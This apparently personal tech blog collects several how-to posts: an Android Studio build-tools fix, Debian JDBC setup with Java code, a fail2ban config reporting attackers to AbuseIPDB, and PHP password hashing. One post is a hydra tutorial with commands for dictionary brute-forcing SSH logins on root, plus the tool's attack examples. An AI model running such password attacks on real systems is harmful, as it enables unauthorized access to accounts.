Android Studio 2.2.2: failed to find Build Tools revision 25

This is very annoying! Every time you update your Android SDK Build-tools (for example 24.0.3 to 25), you need to edit your project configuration. It never happened on Eclipse before. Please bring back support to Eclipse to develop Android application.

Software:

• Android SDK Manager 25.2.2 (Stand Alone)
• Android Studio 2.2.2
• Oracle JDK 1.8.0_102
• Windows 10 x64

This is the error message:

Error:Failed to find Build Tools revision 24.0.2
<a href="/web/joomla/install.build.tools">Install Build Tools 24.0.2 and sync project</a>

To fix it, do these:

in 1: Project change view to Android

Go to [your_project]->app and open build.grandle 

change buildToolsVersion "24.0.2" -> buildToolsVersion "25.0.0"

...
android {
    compileSdkVersion 24
    buildToolsVersion "25.0.0"
...

Save it and click Try Again or Sync your project

Debian Jessie: installing OpenJDK-8, Mysql JDBC and PostgreSQL JDBC

Install all packages:

# apt-get install openjdk-8-jdk libmysql-java libpostgresql-jdbc-java libpostgresql-jdbc-java-doc

Note: openjdk-8-jdk requires backports repository, add this into /etc/apt/sources.list

deb http://ftp.de.debian.org/debian jessie-backports main

To set Java Environment for all users, add/edit /etc/environment:

JAVA_HOME="/usr/lib/jvm/java-8-openjdk-amd64"
CLASSPATH=".:/usr/share/java/mysql.jar:/usr/share/java/postgresql-jdbc4.jar"

Note: if you prefered to use postgresql-jdbc3, replace /usr/share/java/postgresql-jdbc4.jar with /usr/share/java/postgresql.jar

Example Java code loading MySQL:

import java.sql.Connection;

import java.sql.DriverManager;

import java.sql.SQLException;

import java.util.Properties;

class TestDB {

    /*

      /usr/share/java

      http://dev.mysql.com/doc/connector-j/5.1/en/

      https://jdbc.postgresql.org/documentation/documentation.html

    */

   static Connection conn = null;   

   public static void main(String[] args) {

      // MySQL

      try {

         System.out.println("Loading Class com.mysql.jdbc.Driver");

         Class.forName("com.mysql.jdbc.Driver") ;

         System.out.println("Loading com.mysql.jdbc.Driver Successful");

         conn = DriverManager.getConnection("jdbc:mysql://localhost/database?user=user&password=password");

         // Do something with the Connection

         System.out.println("Test Connection Successful");

      } catch (SQLException ex) {

         // handle any errors

         System.out.println("SQLException: " + ex.getMessage());

         System.out.println("SQLState: " + ex.getSQLState());

         System.out.println("VendorError: " + ex.getErrorCode());

      } catch (ClassNotFoundException ex) {

         System.out.println("Class Not Found: " + ex.getMessage());

      }

      // PostgreSQL

      try {

         System.out.println("Loading Class org.postgresql.Driver");

         Class.forName("org.postgresql.Driver");

         System.out.println("Loading org.postgresql.Driver Successful");

         String url = "jdbc:postgresql://localhost/database";

         Properties props = new Properties();

         props.setProperty("user","user");

         props.setProperty("password","password");

         props.setProperty("ssl","true");

         conn = DriverManager.getConnection(url, props); 

         // or

         url = "jdbc:postgresql://localhost/database?user=user&password=password&ssl=true";

         Connection conn = DriverManager.getConnection(url);

         // Do something with the Connection

         System.out.println("Test Connection Successful");

      } catch (SQLException ex) {

         // handle any errors

         System.out.println("SQLException: " + ex.getMessage());

         System.out.println("SQLState: " + ex.getSQLState());

         System.out.println("VendorError: " + ex.getErrorCode());

      } catch (ClassNotFoundException ex) {

         System.out.println("Class Not Found: " + ex.getMessage());

      }

   }

}

References:

• https://help.ubuntu.com/community/JDBCAndMySQL
• http://stackoverflow.com/questions/18631050/how-to-use-classpath-regarding-to-mysql-drivers-could-not-find-driver-with-cla

Script Kiddies to use hydra

This is intended for Education purpose!

After researching how to defend our network, I want to share how to perform what they are doing. It is very easy to perform automatic password attack against various services. One of their tools is hydra. Chrome mark https://www.thc.org/ "The site ahead contains harmful programs" and Firefox mark it as "Reported Unwanted Software Page!". Who's care.... LOL

To install it

# apt-get install hydra

or

# yum install hydra

To create dictionary install British words

# apt-get install wbritish

or

# yum install words

You don't need to run this as root. 

Create a directory (whatever you want). I use directory hydra. 

$ mkdir hydra
$ cd hydra

Now create words file before running hydra.

$ cat /usr/share/dict/words > words.txt

You can perform ssh using

hydra -l root -P words.txt ssh://xxx.xxx.xxx.xxx

To get more option:

$ hydra -h

Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

Options:

  -R        restore a previous aborted/crashed session

  -S        perform an SSL connect

  -s PORT   if the service is on a different default port, define it here

  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE

  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE

  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help

  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login

  -u        loop around users, not passwords (effective! implied with -x)

  -C FILE   colon separated "login:pass" format, instead of -L/-P options

  -M FILE   list of servers to attack, one entry per line, ':' to specify port

  -o FILE   write found login/password pairs to FILE instead of stdout

  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)

  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)

  -w / -W TIME  waittime for responses (32s) / between connects per thread

  -4 / -6   prefer IPv4 (default) or IPv6 addresses

  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode

  -q        do not print messages about connection erros

  -U        service module usage details

  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)

  service   the service to crack (see below for supported protocols)

  OPT       some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL

v3.0. The newest version is always available at http://www.thc.org/thc-hydra

Don't use in military or secret service organizations, or for illegal purposes.

These services were not compiled in: sapr3 afp ncp oracle.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.

E.g.:  % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)

       % export HYDRA_PROXY_HTTP=http://proxy:8080

       % export HYDRA_PROXY_AUTH=user:pass

Examples:

  hydra -l user -P passlist.txt ftp://192.168.0.1

  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN

  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

  hydra -l admin -p password ftp://[192.168.0.0/24]/

  hydra -L logins.txt -P pws.txt -M targets.txt ssh

WARNING: FOR EDUCATION PURPOSE! DO IT ON YOUR LOCAL NETWORK AND WITH YOUR OWN RISK. DOING THIS IS ON PUBLIC NETWORK IS BREAKING A LAW!

fail2ban: autoreporting attack to www.abuseipdb.com

Create file /etc/fail2ban/action.d/abuseipdb.conf
# Fail2Ban configuration file
#
# Author: IGAM Muliarsa
#
#

# Action to report IP address to abuseipdb.com
# you must sign up in https://www.abuseipdb.com
# This action requires API_KEY
# https://www.abuseipdb.com/report/json?key=[API_KEY]&category=[CATEGORIES]&comment=[COMMENT]&ip=[IP]
#
# IMPORTANT:
#
# Reporting an IP of abuse is a serious complaint. Make sure that it is
# serious. Fail2ban developers and network owners recommend you only use this
# action for:
#   * The recidive where the IP has been banned multiple times
#   * Where maxretry has been set quite high, beyond the normal user typing
#     password incorrectly.
#   * For filters that have a low likelyhood of receiving human errors
#

[Definition]

# Option:  actionstart
# Notes.:  command executed once at the start of Fail2Ban.
# Values:  CMD
#
actionstart =

# Option:  actionstop
# Notes.:  command executed once at the end of Fail2Ban
# Values:  CMD
#
actionstop =

# Option:  actioncheck
# Notes.:  command executed once before each actionban command
# Values:  CMD
#
actioncheck =

# Option:  actionban
# Notes.:  command executed when banning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values:  CMD
#
actionban = curl --data 'key=<apikey>' --data 'category=<category>' --data 'ip=<ip>' --data-urlencode 'comment=<matches>' --user-agent 'fail2ban v0.8.12' 'https://www.abuseipdb.com/report/json'

# Option:  actionunban
# Notes.:  command executed when unbanning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values:  CMD
#
actionunban =

[Init]

# Option:  apikey
# Notes    your user apikey from abuseipdb.com user account
# Values:  STRING  Default: None
#
apikey = REPLACE_WITH_YOUR_API_KEY

# Option:  service
# Notes    service name you are reporting on, typically aligns with filter name
# Values:  STRING  Default: None
#
#service =
Edit /etc/fail2ban/jail.conf
...
[sshd]

port    = ssh
logpath = %(sshd_log)s
backend = %(sshd_backend)s
enabled = true
filter = sshd
action = iptables-ipset-proto4[]
        mlocaldb[category=10]
        abuseipdb[category=4,18,22]
...
To find available category, follow this rule.
Restart your fail2ban.
Tested on Fail2ban 0.9.x

References:

• https://www.abuseipdb.com/api.html

PHP >= 5.5: password hashing

To hash password (using default algorithm bcrypt)

$mypass = "password";
$myhash = password_hash($mypass, PASSWORD_DEFAULT);

To verify password

$brutepass = "test";
password_verify ($brutepass, $myhash); // true or false

Storing password in database

"Therefore, it is recommended to store the result in a database column that can expand beyond 60 characters (255 characters would be a good choice)." Maybe varchar(255)

Reference:

• http://www.php.net/manual/en/faq.passwords.php
• http://id1.php.net/manual/en/book.password.php